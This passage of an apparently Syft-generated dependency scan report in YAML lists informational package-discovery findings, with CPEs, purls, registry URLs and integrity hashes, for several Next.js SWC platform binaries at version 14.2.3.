type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin-arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin_arm64:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_arm64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-darwin-arm64@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-darwin-arm64/-/swc-darwin-arm64-14.2.3.tgz
|
|
integrity: sha512-3pEYo/RaGqPP0YzwnlmPN2puaF2WMLM3apt5jLW2fFdXD9+pqcoTzRk+iZsf8ta7+quAe4Q6Ms0nR0SFGFdS1A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 297b85bfc16e4adc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-darwin-x64 14.2.3'
|
|
title: '@next/swc-darwin-x64 14.2.3'
|
|
description: 'Package discovered: @next/swc-darwin-x64 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b0a8be32ec095ef0
|
|
name: '@next/swc-darwin-x64'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin-x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin_x64:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_darwin:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-darwin-x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_darwin_x64:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-darwin-x64@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-darwin-x64/-/swc-darwin-x64-14.2.3.tgz
|
|
integrity: sha512-6adp7waE6P1TYFSXpY366xwsOnEXM+y1kgRpjSRVI2CBDOcbRjsJ67Z6EgKIqWIue52d2q/Mx8g9MszARj8IEA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: eaf37f3f72892d80
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3'
|
|
title: '@next/swc-linux-arm64-gnu 14.2.3'
|
|
description: 'Package discovered: @next/swc-linux-arm64-gnu 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: b768ca89954904c7
|
|
name: '@next/swc-linux-arm64-gnu'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_gnu:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz
|
|
integrity: sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 27ac7498beafdc1b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3'
|
|
title: '@next/swc-linux-arm64-musl 14.2.3'
|
|
description: 'Package discovered: @next/swc-linux-arm64-musl 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f485e6463dfab8af
|
|
name: '@next/swc-linux-arm64-musl'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64-musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64_musl:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_arm64:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-linux-arm64-musl@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz
|
|
integrity: sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6ebdba72ca21b201
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3'
|
|
title: '@next/swc-linux-x64-gnu 14.2.3'
|
|
description: 'Package discovered: @next/swc-linux-x64-gnu 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1a0b07449dd69139
|
|
name: '@next/swc-linux-x64-gnu'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_gnu:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-linux-x64-gnu@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz
|
|
integrity: sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: dc907ac1b205061b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-linux-x64-musl 14.2.3'
|
|
title: '@next/swc-linux-x64-musl 14.2.3'
|
|
description: 'Package discovered: @next/swc-linux-x64-musl 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2ac68dfe221aa840
|
|
name: '@next/swc-linux-x64-musl'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64-musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64_musl:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux-x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux_x64:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_linux:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-linux-x64-musl@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz
|
|
integrity: sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 1f0b6c5423b99cbb
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3'
|
|
title: '@next/swc-win32-arm64-msvc 14.2.3'
|
|
description: 'Package discovered: @next/swc-win32-arm64-msvc 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f14dd9ed0ebaa5a4
|
|
name: '@next/swc-win32-arm64-msvc'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64-msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64_msvc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_arm64:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz
|
|
integrity: sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: de3c183aece29806
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3'
|
|
title: '@next/swc-win32-ia32-msvc 14.2.3'
|
|
description: 'Package discovered: @next/swc-win32-ia32-msvc 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0272e47fa12e3e5d
|
|
name: '@next/swc-win32-ia32-msvc'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
